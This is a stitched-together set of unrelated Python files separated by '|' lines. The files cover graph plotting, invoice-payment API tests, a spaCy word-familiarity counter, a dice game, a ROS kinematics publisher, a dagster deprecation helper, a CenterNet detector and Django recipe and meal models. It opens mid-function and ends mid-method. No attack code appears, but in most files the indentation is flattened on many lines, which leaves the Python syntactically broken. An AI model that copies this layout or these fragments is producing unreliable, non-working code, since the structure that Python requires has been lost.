data_points = dict(zip(keys, values))
    graph = nx.from_numpy_array(normalize(x))
    if data_points is not None:
        pos = data_points
    else:
        pos = nx.spring_layout(graph)
    for n, p in pos.items():
        graph.nodes[n]['p'] = p
fig1, ax1 = plt.subplots()
if node_colors is None:
node_colors = np.sum(x, axis=1)
    mcl1 = nx.draw_networkx_nodes(graph, pos=pos, node_color=node_colors, cmap=plt.cm.PuOr,
                                  node_size=80, ax=ax1)
nx.draw_networkx_edges(graph, pos=pos, edge_color='black', alpha=0.2, ax=ax1)
divider1 = make_axes_locatable(ax1)
cax1 = divider1.append_axes("right", size="5%", pad=0.05)
plt.colorbar(mcl1, cax=cax1)
plt.grid()
ax1.tick_params(left=True, bottom=True, labelleft=True, labelbottom=True)
if outdir is not None:
if not os.path.exists(outdir):
os.mkdir(outdir)
        plt.savefig(os.path.join(outdir, 'nodes_' + ind))
else:
plt.show()
def plot_avg_graph(graphs, eigenfunc, graph_states, outdir=None, data_points=None):
"""
Plot average graphs for each state.
Parameters
----------
graphs: array, (n_graphs, n_nodes, n_nodes)
Snapshots of the time-dependent graph.
eigenfunc: array
        Eigenfunctions of the transfer operator.
graph_states: array
Number of states for k-means clustering, based on number of dominant eigenvalues.
    outdir: str
Dir to save plots.
data_points: 2D array, (n_nodes, 2)
"""
k_means = KMeans(n_clusters=graph_states).fit(np.real(eigenfunc[:, :graph_states]))
for idx in range(graph_states):
ind = np.argwhere(k_means.labels_ == idx)
graph_idx = graphs[ind, :].squeeze()
avg_graphs = np.mean(graph_idx, axis=0)
show_graph(avg_graphs, str(idx), outdir, data_points)
def combine_plots(path_to_img):
files = glob.glob(path_to_img + '/*.png')
output = plt.imread(files[0])[:, :, :3]
for i in range(1, len(files)):
img = plt.imread(files[i])[:, :, :3]
output = concat_images(output, img)
plt.imsave(path_to_img + '/output.png', output)
def concat_images(imga, imgb):
new_img = np.concatenate((imga, imgb), axis=1)
return new_img
def create_graphs_from_matrix(df):
"""
Create graphs from matrix.
Parameters
----------
df: pandas DataFrame, (n_time_points, n_features)
DataFrame of features and time points.
Returns
-------
data_dict: dictionary
Dictionary with keys: time_points/names of samples;
values: 2D array, (n_nodes, n_nodes).
"""
n_nodes, n_graphs = df.shape[-1], df.shape[0]
data_dict = {}
for i in range(n_graphs):
adj_matrix = np.zeros((n_nodes, n_nodes))
if isinstance(df, pd.DataFrame):
name = df.iloc[i, :].name
current_array = df.iloc[i, :]
else:
name = i
current_array = df[i, :]
non_zero = np.nonzero(current_array)[0]
pairs = list(itertools.combinations(non_zero, 2))
for pair in pairs:
n1 = pair[0]
n2 = pair[1]
adj_matrix[n1][n2] = current_array[n1] * current_array[n2]
adj_matrix[n2][n1] = current_array[n1] * current_array[n2]
data_dict[name] = adj_matrix
return data_dict
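
# A minimal usage sketch (illustrative only): turn a small feature table into
# per-sample co-occurrence graphs with create_graphs_from_matrix. Every pair of
# non-zero features in a row becomes a weighted edge in that row's adjacency
# matrix; the default integer column index keeps the positional lookups valid.
if __name__ == '__main__':
    demo_df = pd.DataFrame(
        [[1.0, 0.0, 2.0],
         [0.5, 0.5, 0.0]],
        index=['t0', 't1'],
    )
    demo_graphs = create_graphs_from_matrix(demo_df)
    for sample_name, adjacency in demo_graphs.items():
        print(sample_name, adjacency.shape)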
|
from moco_wrapper.util.response import JsonResponse, ListingResponse, EmptyResponse
from moco_wrapper.util.generator import InvoiceItemGenerator, InvoicePaymentGenerator
from .. import IntegrationTest
from datetime import date
class TestInvoicePayment(IntegrationTest):
def get_customer(self):
with self.recorder.use_cassette("TestInvoicePayment.get_customer"):
customer_create = self.moco.Company.create(
"TestInvoicePayment",
company_type="customer"
)
return customer_create.data
def get_invoice(self):
customer = self.get_customer()
with self.recorder.use_cassette("TestInvoicePayment.get_invoice"):
gen = InvoiceItemGenerator()
items = [
gen.generate_title("dummy invoice item title"),
gen.generate_description("dummy invoice item description"),
gen.generate_lump_position("server hardware", 2000)
]
invoice_create = self.moco.Invoice.create(
customer.id,
"dummy invoice",
date(2020, 1, 1),
date(2021, 1, 1),
date(2020, 1, 1),
date(2020, 3, 1),
"dummy invoice",
19,
"EUR",
items,
)
return invoice_create.data
def test_getlist(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_getlist"):
payment_list = self.moco.InvoicePayment.getlist(invoice_id=invoice.id)
assert payment_list.response.status_code == 200
assert isinstance(payment_list, ListingResponse)
def test_create(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_create"):
payment_date = date(2020, 1, 2)
amount = 200
currency = "EUR"
payment_create = self.moco.InvoicePayment.create(
payment_date,
invoice.id,
amount,
"EUR"
)
assert payment_create.response.status_code == 200
assert isinstance(payment_create, JsonResponse)
assert payment_create.data.date == payment_date.isoformat()
assert payment_create.data.paid_total == amount
assert payment_create.data.currency == currency
assert payment_create.data.invoice.id == invoice.id
def test_create_bulk(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_create_bulk"):
gen = InvoicePaymentGenerator()
items = [
gen.generate(date(2020, 1, 1), invoice.id, 200, "EUR"),
gen.generate(date(2020, 1, 2), invoice.id, 150, "EUR")
]
payment_create = self.moco.InvoicePayment.create_bulk(items)
assert payment_create.response.status_code == 200
            assert isinstance(payment_create, ListingResponse)
def test_get(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_get"):
payment_date = date(2020, 1, 2)
amount = 200
currency = "EUR"
payment_create = self.moco.InvoicePayment.create(
payment_date,
invoice.id,
amount,
"EUR"
)
payment_get = self.moco.InvoicePayment.get(payment_create.data.id)
assert payment_create.response.status_code == 200
assert payment_get.response.status_code == 200
assert isinstance(payment_create, JsonResponse)
assert isinstance(payment_get, JsonResponse)
assert payment_get.data.date == payment_date.isoformat()
assert payment_get.data.paid_total == amount
assert payment_get.data.currency == currency
assert payment_get.data.invoice.id == invoice.id
def test_update(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_update"):
payment_date = date(2020, 1, 2)
amount = 200
currency = "EUR"
payment_create = self.moco.InvoicePayment.create(
date(2019, 12, 31),
invoice.id,
1,
"EUR"
)
payment_update = self.moco.InvoicePayment.update(
payment_create.data.id,
payment_date=payment_date,
paid_total=amount,
currency="EUR"
)
assert payment_create.response.status_code == 200
assert payment_update.response.status_code == 200
assert isinstance(payment_create, JsonResponse)
assert isinstance(payment_update, JsonResponse)
assert payment_update.data.date == payment_date.isoformat()
assert payment_update.data.paid_total == amount
assert payment_update.data.currency == currency
assert payment_update.data.invoice.id == invoice.id
def test_delete(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_delete"):
payment_create = self.moco.InvoicePayment.create(
date(2020, 1, 1),
invoice.id,
100,
"EUR"
)
payment_delete = self.moco.InvoicePayment.delete(payment_create.data.id)
assert payment_create.response.status_code == 200
assert payment_delete.response.status_code == 204
assert isinstance(payment_create, JsonResponse)
assert isinstance(payment_delete, EmptyResponse)
|
import numpy as np
import re
import spacy
from functools import lru_cache
import en_core_web_lg
nlp = en_core_web_lg.load()
# Build the word-familiarity dictionary
###############
# Load the word list into new_list
with open("tango_sitasimiyasusa_list.txt", "r", encoding="utf-8") as f:
list = f.readlines()
new_list = []
for i in list:
word = i.split()
new_list.append(word)
#####################################
# Extract the numeric parameter of interest (to check its correlation)
# word, familiarity score (100: unfamiliar, 700: familiar)
sitasimi_tango={}
count_level = 1
while count_level < 1945:
    # extract the values
    tango_list = new_list[count_level][0]  # word
    suuti_list = new_list[count_level][5]  # familiarity score
    # convert the string to a number
y = round(float(suuti_list)*100)
sitasimi_tango[tango_list] = y
count_level+=1
with open('book/book1.txt', 'r') as f:
    # convert newlines ("\n") to ""
#text_list = f.read().splitlines()
text = f.read()
# remove double quotes with a regular expression
text = re.sub('"', '', text)
# run the text through the spaCy pipeline
pos = nlp(text)
kazu = 0
hinsi = []  # part-of-speech names
hinsi_kosuu = []  # counts per part of speech; indices match hinsi
list_bangou = 0
kigou_reigai = ["=", "+", "'"]  # symbols excluded from the total word count
kigou = 0
# parts of speech treated as content words
#naiyougo_list=["NN","NNS", "NNP", "NNPS", "VB", "VBN", "VBP", "VBZ","JJ", "JJR", "JJS", "RB", "RBR", "RBS"]
#naiyougo_list=["NN", "VB", "JJ", "RB"]  # nouns, verbs, adjectives, adverbs
naiyougo_list = ["ADJ", "ADV", "NOUN", "VERB"]
sent=""
wariai=[]
for token in pos:
    # if the token is a content word
    if token.pos_ in naiyougo_list:
        # lemmatize
        sent = token.lemma_
        # if the lemma is in the familiarity dictionary
        if sent.lower() in sitasimi_tango:
            wariai.append(sitasimi_tango[sent.lower()])
# results
print(sum(wariai))
print(len(wariai))
hasseiritu = sum(wariai)/len(wariai)
print(hasseiritu)
#476.452 438.136
#418.619 429.575
|
from random import randint
from time import sleep
cont = 1
print('Dados jogados!!!')
dados = {'Pessoa 1': randint(1,6),
'Pessoa 2': randint(1,6),
'Pessoa 3': randint(1,6),
'Pessoa 4': randint(1,6)}
for item in sorted(dados, key = dados.get, reverse = True):
sleep(1)
print (f'{cont}º lugar: {item} com {dados[item]}.')
cont += 1
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import rospy
from std_msgs.msg import Float64
import math
import forward_kinematics_module
theta = [math.pi/2,0]
d = [0,0]
alpha = [0,0]
a = [120,109.25]
def forward_kinematics_publisher():
limb1 = rospy.Publisher('/manipulator/limb1_controller/command',Float64, queue_size=10)
leg1 = rospy.Publisher('/manipulator/leg1_controller/command',Float64, queue_size=10)
rospy.init_node('forward_kinematics_publisher', anonymous=True)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb1 = float(input("{:22s}".format("Enter theta_limb1: ")))
theta_leg1 = float(input("{:22s}".format("Enter theta_leg1: ")))
theta = [theta_limb1, theta_leg1, 0]
if 0.0 <= theta_limb1 <= 180.0 and 0.0 <= theta_leg1 <= 180.0:
            limb1_angle = theta_limb1 * math.pi / 180
            leg1_angle = theta_leg1 * math.pi / 180
            rospy.loginfo("\ntheta_limb1 = %f\ntheta_leg1 = %f", limb1_angle, leg1_angle)
            limb1.publish(limb1_angle)
            leg1.publish(leg1_angle)
print ("=========================\n")
limb2 = rospy.Publisher('/manipulator/limb2_controller/command',Float64, queue_size=10)
leg2 = rospy.Publisher('/manipulator/leg2_controller/command',Float64, queue_size=10)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb2 = float(input("{:22s}".format("Enter theta_limb2: ")))
theta_leg2 = float(input("{:22s}".format("Enter theta_leg2: ")))
theta = [theta_limb2, theta_leg2, 0]
if 0.0 <= theta_limb2 <= 180.0 and 0.0 <= theta_leg2 <= 180.0:
            limb2_angle = theta_limb2 * math.pi / 180
            leg2_angle = theta_leg2 * math.pi / 180
            rospy.loginfo("\ntheta_limb2 = %f\ntheta_leg2 = %f", limb2_angle, leg2_angle)
            limb2.publish(limb2_angle)
            leg2.publish(leg2_angle)
print ("=========================\n")
limb3= rospy.Publisher('/manipulator/limb3_controller/command',Float64, queue_size=10)
leg3 = rospy.Publisher('/manipulator/leg3_controller/command',Float64, queue_size=10)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb3 = float(input("{:22s}".format("Enter theta_limb3: ")))
theta_leg3 = float(input("{:22s}".format("Enter theta_leg3: ")))
theta = [theta_limb3, theta_leg3, 0]
if 0.0 <= theta_limb3 <= 180.0 and 0.0 <= theta_leg3 <= 180.0:
            limb3_angle = theta_limb3 * math.pi / 180
            leg3_angle = theta_leg3 * math.pi / 180
            rospy.loginfo("\ntheta_limb3 = %f\ntheta_leg3 = %f", limb3_angle, leg3_angle)
            limb3.publish(limb3_angle)
            leg3.publish(leg3_angle)
print ("=========================\n")
limb4 = rospy.Publisher('/manipulator/limb4_controller/command',Float64, queue_size=10)
leg4 = rospy.Publisher('/manipulator/leg4_controller/command',Float64, queue_size=10)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb4 = float(input("{:22s}".format("Enter theta_limb4: ")))
theta_leg4 = float(input("{:22s}".format("Enter theta_leg4 ")))
theta = [theta_limb4, theta_leg4, 0]
if 0.0 <= theta_limb4 <= 180.0 and 0.0 <= theta_leg4 <= 180.0:
            limb4_angle = theta_limb4 * math.pi / 180
            leg4_angle = theta_leg4 * math.pi / 180
            rospy.loginfo("\ntheta_limb4 = %f\ntheta_leg4 = %f", limb4_angle, leg4_angle)
            limb4.publish(limb4_angle)
            leg4.publish(leg4_angle)
print ("=========================\n")
final_transformation_matrix = forward_kinematics_module.compute_coordinates(theta, d, alpha, a)
if __name__ == '__main__':
try:
forward_kinematics_publisher()
except rospy.ROSInterruptException:
pass
|
import warnings
from dagster import check
def canonicalize_backcompat_args(
new_val, new_arg, old_val, old_arg, coerce_old_to_new=None, additional_warn_txt=None
):
'''
Utility for managing backwards compatibility of two related arguments.
For example if you had an existing function
    def is_new(old_flag):
        return not old_flag
And you decided you wanted a new function to be:
def is_new(new_flag):
return new_flag
However you want an in between period where either flag is accepted. Use
canonicalize_backcompat_args to manage that:
def is_new(old_flag=None, new_flag=None):
return canonicalize_backcompat_args(
new_val=new_flag,
new_arg='new_flag',
old_val=old_flag,
old_arg='old_flag',
coerce_old_to_new=lambda val: not val,
)
    In this example, if the caller sets both new_flag and old_flag, it will fail by throwing
    a CheckError. If the caller sets only old_flag, the value is run through the coercion
    function, a deprecation warning is emitted, and then execution proceeds.
canonicalize_backcompat_args returns the value as if *only* new_val were specified
'''
check.str_param(new_arg, 'new_arg')
check.str_param(old_arg, 'old_arg')
check.opt_callable_param(coerce_old_to_new, 'coerce_old_to_new')
check.opt_str_param(additional_warn_txt, 'additional_warn_txt')
if new_val is not None:
if old_val is not None:
check.failed(
'Do not use deprecated "{old_arg}" now that you are using "{new_arg}".'.format(
old_arg=old_arg, new_arg=new_arg
)
)
return new_val
if old_val is not None:
        warnings.warn(
            '"{old_arg}" is deprecated, use "{new_arg}" instead.'.format(
                old_arg=old_arg, new_arg=new_arg
            )
            + ((' ' + additional_warn_txt) if additional_warn_txt else ''),
            # This punches up to the caller of canonicalize_backcompat_args
            stacklevel=3,
        )
return coerce_old_to_new(old_val) if coerce_old_to_new else old_val
return new_val
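
# A minimal usage sketch (illustrative only, mirroring the docstring above): a
# function migrating from a deprecated 'old_flag' argument to 'new_flag' while
# both are still accepted.
def _is_new_example(old_flag=None, new_flag=None):
    """Illustrative only: resolve the deprecated old_flag into new_flag."""
    return canonicalize_backcompat_args(
        new_val=new_flag,
        new_arg='new_flag',
        old_val=old_flag,
        old_arg='old_flag',
        coerce_old_to_new=lambda val: not val,
    )

# _is_new_example(new_flag=True)                -> True
# _is_new_example(old_flag=True)                -> False, after emitting a deprecation warning
# _is_new_example(old_flag=True, new_flag=True) -> raises a CheckError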
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
import sys
import csv
# try:
# from external.nms import soft_nms
# except:
# print('NMS not imported! If you need it,'
# ' do \n cd $CenterNet_ROOT/src/lib/external \n make')
sys.path.insert(0, '../')
from models.decode import ctdet_decode
from models.utils import flip_tensor
from utils.image import get_affine_transform
from utils.post_process import ctdet_post_process
from utils.debugger import Debugger
from detectors.base_detector import BaseDetector
from detectors.utils import soft_nms
class CtdetDetector(BaseDetector):
def __init__(self, opt):
super(CtdetDetector, self).__init__(opt)
def process(self, images, return_time=False):
with torch.no_grad():
output = self.model(images)[-1]
hm = output['hm'].sigmoid_()
wh = output['wh']
reg = output['reg'] if self.opt.reg_offset else None
if self.opt.flip_test:
hm = (hm[0:1] + flip_tensor(hm[1:2])) / 2
wh = (wh[0:1] + flip_tensor(wh[1:2])) / 2
reg = reg[0:1] if reg is not None else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ctdet_decode(hm, wh, reg=reg, cat_spec_wh=self.opt.cat_spec_wh, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
    # rescale detections back to the original image coordinates
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
dets = dets.reshape(1, -1, dets.shape[2])
dets = ctdet_post_process(
dets.copy(), [meta['c']], [meta['s']],
meta['out_height'], meta['out_width'], self.opt.num_classes)
for j in range(1, self.num_classes + 1):
dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 5)
dets[0][j][:, :4] /= scale
return dets[0]
    # filter the boxes with soft_nms
def merge_outputs(self, detections):
results = {}
for j in range(1, self.num_classes + 1):
results[j] = np.concatenate(
[detection[j] for detection in detections], axis=0).astype(np.float32)
if len(self.scales) > 1 or self.opt.nms:
soft_nms(results[j], thresh=0.5, type='gaussian')
scores = np.hstack(
[results[j][:, 4] for j in range(1, self.num_classes + 1)])
if len(scores) > self.max_per_image:
kth = len(scores) - self.max_per_image
thresh = np.partition(scores, kth)[kth]
for j in range(1, self.num_classes + 1):
keep_inds = (results[j][:, 4] >= thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
detection = dets.detach().cpu().numpy().copy()
detection[:, :, :4] *= self.opt.down_ratio
for i in range(1):
img = images[i].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][i].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm_{:.1f}'.format(scale))
debugger.add_img(img, img_id='out_pred_{:.1f}'.format(scale))
for k in range(len(dets[i])):
if detection[i, k, 4] > self.opt.center_thresh:
debugger.add_coco_bbox(detection[i, k, :4], detection[i, k, -1],
detection[i, k, 4],
img_id='out_pred_{:.1f}'.format(scale))
def show_results(self, debugger, image, results, img_num):
lab_name = ['holothurian', 'starfish', 'echinus', 'scallop']
debugger.add_img(image, img_id='ctdet')
with open('1.csv', 'a+', newline='', encoding='utf-8') as f:
# if f.readlines() is not None:
# fieldnames = ['name', 'image_id', 'confidence', 'xmin', 'ymin', 'xmax','ymax']
# writer = csv.DictWriter(f, fieldnames=fieldnames)
# writer.writeheader()
f = csv.writer(f, delimiter=',')
for j in range(1, self.num_classes + 1):
for bbox in results[j]:
if bbox[4] > self.opt.vis_thresh:
debugger.add_coco_bbox(bbox[:4], j - 1, bbox[4], img_id='ctdet')
f.writerow([lab_name[j - 1], img_num[:-4] + '.xml', str(bbox[4]), \
str(int(bbox[0])), str(int(bbox[1])), str(int(bbox[2])), str(int(bbox[3]))])
# writer.writerow({'name':lab_name[j - 1], 'image_id':img_num[:-4] + '.xml', \
# 'confidence':str(bbox[4]), 'xmin':str(int(bbox[0])), 'ymin':str(int(bbox[1])), \
# 'xmax':str(int(bbox[2])), 'ymax':str(int(bbox[3]))})
# print('bbox', bbox[0], bbox[1], bbox[2], bbox[3], bbox[4])
# debugger.show_all_imgs(pause=self.pause)
#debugger.save_all_imgs(path='/mnt/data-1/data/lcx/CenterNet-master/outputs', genID=True)
|
from collections import OrderedDict
from math import ceil
from datetime import datetime
from calendar import Calendar
from django.db import models
from django.conf import settings
from django.shortcuts import resolve_url
from dateutils import relativedelta
from sorl.thumbnail import ImageField, get_thumbnail
from django.template.defaultfilters import pluralize
from markdown import markdown
from .decorators import method_cache
class Diet(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Meta:
verbose_name = 'régime'
class Ingredient(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
unit = models.CharField(max_length=100, verbose_name='unité',
choices=(('g', 'g'),
('kg', 'kg'),
('cl', 'cl'),
('l', 'l'),
('unit', 'unité'),))
price = models.FloatField(verbose_name='prix')
providers = models.TextField(blank=True, verbose_name='fournisseurs')
diets = models.ManyToManyField(Diet, blank=True, verbose_name='régimes')
@method_cache()
def diets_str(self):
return ', '.join([d.name.title() for d in self.diets.all()]) if\
self.diets.count() else 'Omnivore'
diets_str.short_description = 'Régimes'
def __str__(self):
return self.name
def get_absolute_url(self):
return resolve_url('ingredient_detail', pk=self.pk)
class Meta:
verbose_name = 'ingrédient'
class RecipeIngredient(models.Model):
recipe = models.ForeignKey('Recipe', verbose_name='recette')
ingredient = models.ForeignKey(Ingredient, verbose_name='ingrédient')
quantity = models.FloatField(verbose_name='quantité')
def __str__(self):
if self.recipe and self.ingredient:
return '{recipe} — {ingredient}'\
.format(recipe=self.recipe, ingredient=self.ingredient)
else:
return 'Ingrédient de recette'
class Meta:
verbose_name = 'ingrédient de recette'
verbose_name_plural = 'ingrédients de recette'
class Ustensil(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
def __str__(self):
return self.name
class Meta:
verbose_name = 'ustensile'
class ParentRecipe(models.Model):
parent = models.ForeignKey('Recipe', verbose_name='recette parente',
related_name='childrecipe_set')
child = models.ForeignKey('Recipe', verbose_name='recette enfant',
related_name='parentrecipe_set')
class Meta:
verbose_name = 'recette parente'
verbose_name_plural = 'recettes parentes'
class Recipe(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
meal_type = models.CharField(max_length=10,
choices=(('starter', 'entrée'),
('meal', 'plat'),
('dessert', 'dessert')),
verbose_name='type de recette',
)
parts = models.IntegerField(verbose_name='nombre de parts')
picture = ImageField(upload_to='recipe', verbose_name='image', blank=True)
preparation_time = models.DurationField(null=True, blank=True,
verbose_name='temps de '
'préparation',
help_text='Entrez le temps de '
'préparation requis, au format '
'HH:MM:SS. Laissez vide si non '
'nécessaire.')
cooking_time = models.DurationField(null=True, blank=True,
verbose_name='temps de cuisson',
help_text='Entrez le temps de '
'cuisson requis, au format HH:MM:SS. '
'Laissez vide si non nécessaire.')
description = models.TextField(verbose_name='descriptif de la recette')
licence = models.TextField(blank=True, verbose_name='licence',
default=settings.DEFAULT_RECIPE_LICENCE)
author = models.CharField(max_length=100, verbose_name='auteur',
default=settings.DEFAULT_RECIPE_AUTHOR)
parent_recipes = models.ManyToManyField('self', blank=True,
verbose_name='recettes de base',
through=ParentRecipe,
through_fields=('child', 'parent'),
symmetrical=False,
related_name='children_recipes')
ingredients = models.ManyToManyField(Ingredient, through=RecipeIngredient,
verbose_name='ingrédients')
ustensils = models.ManyToManyField(Ustensil, blank=True,
verbose_name='ustensiles')
diets = models.ManyToManyField(Diet, verbose_name='régimes')
def __str__(self):
return self.name
def picture_str(self):
thumb = get_thumbnail(self.picture, '100x100', crop='center')
if thumb:
return '<img src="{}" alt="" />'.format(thumb.url)
else:
return ''
picture_str.short_description = 'Image'
picture_str.allow_tags = True
def get_contents(self):
return markdown(self.description)
def get_licence(self):
return markdown(self.licence)
def get_diets(self):
""" return the list of diets for this recipe.
"""
diets = [[d for d in i.diets.all()]
for i in self.ingredients.all()]
total_diets = set()
for diet in diets:
if len(total_diets) == 0:
total_diets = set(diet)
total_diets = total_diets.intersection(diet)
for cur_diet in self.diets.all():
if cur_diet not in total_diets:
self.diets.remove(cur_diet)
self.diets.add(*total_diets)
def diets_str(self):
diets = [d.name for d in self.diets.all()]
return ', '.join(diets) if diets else 'Omnivore'
diets_str.short_description = 'régimes'
@method_cache()
def price(self):
""" return the total price of the recipe
"""
price = 0
for recipe_ingredient in self.recipeingredient_set.all():
price += recipe_ingredient.ingredient.price *\
recipe_ingredient.quantity
return '{} €'.format(price) # TODO: the currency should be dynamic
price.short_description = 'prix'
def get_absolute_url(self):
return resolve_url('recipe_detail', pk=self.pk)
class Meta:
verbose_name = 'recette'
class MealParticipant(models.Model):
meal = models.ForeignKey('Meal', verbose_name='repas')
diet = models.ForeignKey(Diet, verbose_name='régime', blank=True,
null=True,
help_text='Laissez vide si pas de régime spécial')
count = models.IntegerField(verbose_name='nombre de personnes')
def diet_name(self):
return self.diet.name if self.diet else 'Omnivore'
@method_cache()
def can_eat(self):
"""returns a list of recipes that those participants can eat.
"""
if self.diet is None:
return self.meal.recipes.all()
return [r for r in self.meal.recipes.all()
if self.diet in r.diets.all()]
def __str__(self):
return '{meal} — {count} × {diet}'.format(meal=self.meal,
count=self.count,
diet=self.diet_name())
class Meta:
verbose_name = 'participant à un repas'
verbose_name_plural = 'participants à un repas'
class Meal(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
date = models.DateTimeField(verbose_name='Date et heure')
recipes = models.ManyToManyField(Recipe, verbose_name='recettes')
session = models.ForeignKey('Session', blank=True, null=True)
def __str__(self):
return self.name
@method_cache()
def recipes_list(self):
return self.recipes.order_by('meal_type')
@method_cache()
def participants(self):
return self.mealparticipant_set.all()
@method_cache()
def participants_count(self):
return sum([mp.count for mp in self.mealparticipant_set.all()])
participants_count.short_description = 'Nombre de participants'
@method_cache()
def ingredients_list(self):
"""returns a list of ingredients needed for all recipes in this meal.
The ingredients are returned as dicts containing the Ingredient itself,
the quantity needed, and the total price of that ingredient.
"""
ingredients = {}
for recipe in self.recipes.all():
# first, we get the total number of parts we have to make (we only
# count diet-compatible participants).
# then, we calculate the total number of this recipe that will be
# needed.
parts_count = self.recipe_diet_participants()[recipe]
recipe_count = ceil(parts_count / recipe.parts)
for recipe_ingredient in recipe.recipeingredient_set.all():
if recipe_ingredient.quantity * recipe_count > 0:
if recipe_ingredient.ingredient not in ingredients:
ingredients[recipe_ingredient.ingredient] = 0
ingredients[recipe_ingredient.ingredient] += \
recipe_ingredient.quantity * recipe_count
ingredients_list = []
for ingredient, quantity in ingredients.items():
ingredients_list.append({'ingredient': ingredient,
'quantity': quantity,
'price': quantity * ingredient.price})
return ingredients_list
@method_cache()
def total_price(self):
"""returns the sum of the individual price of each ingredient in each
recipe of the meal.
"""
price = sum([i['price'] for i in self.ingredients_list()])
return price
@method_cache()
def ustensils_list(self):
ustensils = {}
for recipe in self.recipes.all():
for ustensil in recipe.ustensils.all():
if ustensil not in ustensils:
ustensils[ustensil] = []
ustensils[ustensil].append(recipe)
return [{'ustensil': u, 'used_in': r} for u, r in ustensils.items()]
@method_cache()
def recipe_diet_participants(self):
"""returns a dict containing participants count for each recipe of the
meal.
"""
participants = {}
omni_participants_count = sum([p.count for p in
self.mealparticipant_set
.filter(diet=None)])
for recipe in self.recipes.all():
if recipe not in participants:
participants[recipe] = omni_participants_count
diets = recipe.diets.all()
for diet in diets:
participants[recipe] += sum([p.count for p in
self.mealparticipant_set
.filter(diet__name=diet)])
return participants
@method_cache()
def warnings(self):
"""returns a list of warnings concerning this meal (does a recipe not
have any compatible participant? Cannot a participant eat something?)
"""
warnings = OrderedDict()
for recipe, part in self.recipe_diet_participants().items():
if part == 0:
warnings[recipe] = ('Personne ne peut manger {}'
.format(recipe))
for part in self.participants():
if not part.can_eat():
warnings[part] = ('{} {}{} ne peu{}t rien manger'
.format(part.count,
part.diet,
pluralize(part.count),
pluralize(part.count, 'ven')))
return warnings
def admin_warnings(self):
warnings = self.warnings().values()
if len(warnings):
return '\n'.join(['<p class="text-danger"><span class="glyphicon '
'glyphicon-exclamation-sign"></span> {}</p>\n'
.format(s) for s in warnings])
else:
return '<p class="text-success"><span class="glyphicon '\
'glyphicon-ok-sign"></span> Tout va bien ♥</p>'
admin_warnings.short_description = 'Avertissements'
admin_warnings.allow_tags = True
@method_cache()
def status(self):
"""returns whether this meal is complete (has something for each
participant) or not.
"""
return len(self.warnings()) == 0
status.short_description = 'Statut'
def admin_roadmap(self):
return '<a href="{url}" title="Générer la feuille de route" '\
'target="_blank"><span class=" glyphicon glyphicon-list">'\
'</span></a>'.format(
url=resolve_url('roadmap_meal',
meal_id=self.id))
admin_roadmap.short_description = 'Feuille de route'
admin_roadmap.allow_tags = True
class Meta:
verbose_name = 'repas'
verbose_name_plural = 'repas'
class Session(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
def calendar(self):
"""generates calendars representing all meals in the session, as a list
of Calendar.monthdatescalendar() lists.
In those lists, the second values of tuples are the corresponding Meal
objects.
"""
cur_month = None
meals = self.meal_set.order_by('date')
meals_dates = {}
meals_count = 0
for meal in meals:
cur_month = meal.date if cur_month is None else cur_month
meals_count += 1
            if meal.date.date() not in meals_dates:
                meals_dates[meal.date.date()] = []
            meals_dates[meal.date.date()].append(meal)
if not cur_month:
cur_month = datetime.now()
months = []
cal = Calendar()
month = cal.monthdatescalendar(cur_month.year, cur_month.month)
remaining_meals = meals_count
while remaining_meals > 0:
month = cal.monthdatescalendar(cur_month.year, cur_month.month)
for i, month_week in enumerate(month):
for j, day in enumerate(month_week):
meal_dates = meals_dates[day] if day in meals_dates and \
day.month == cur_month.month else []
remaining_meals -= len(meal_dates)
month[i][j] = {'date': month[i][j], 'meals': meal_dates}
months.append({'month': cur_month, 'dates': month})
cur_month = cur_month + relativedelta(months=1)
return months
@method_cache()
def ingredients_list(self):
"""returns a list of ingredients needed for all recipes in all meals of
this session. The ingredients are returned as dicts containing the
Ingredient itself, the quantity needed, and the total price of that
ingredient.
"""
ingredients = OrderedDict()
for meal in self.meal_set.order_by('date'):
for ingredient in meal.ingredients_list():
if ingredient['ingredient'] in ingredients:
ingredients[ingredient['ingredient']]['quantity'] += \
ingredient['quantity']
ingredients[ingredient['ingredient']]['price'] += \
ingredient['price']
else:
ingredients[ingredient['ingredient']] = ingredient
ingredients[ingredient['ingredient']]['date'] = \
meal.date
ingredients_list = [i for i in ingredients.values()]
return ingredients_list
@method_cache()
def total_price(self):
"""returns the sum of the individual price of each ingredient in each
recipe of each meal of this session.
"""
price = sum([i['price'] for i in self.ingredients_list()])
return price
def meals(self):
"""returns the Meal list, ordered by date.
"""
return self.meal_set.order_by('date')
def admin_roadmap(self):
return '<a href="{url}" title="Générer la feuille de route" '\
'target="_blank"><span class=" glyphicon glyphicon-list">'\
'</span></a>'.format(url=resolve_url('roadmap_session',
session_id=self.id))
admin_roadmap.short_description = 'Feuille de route'
admin_roadmap.allow_tags = True
@method_cache()
def warnings(self):
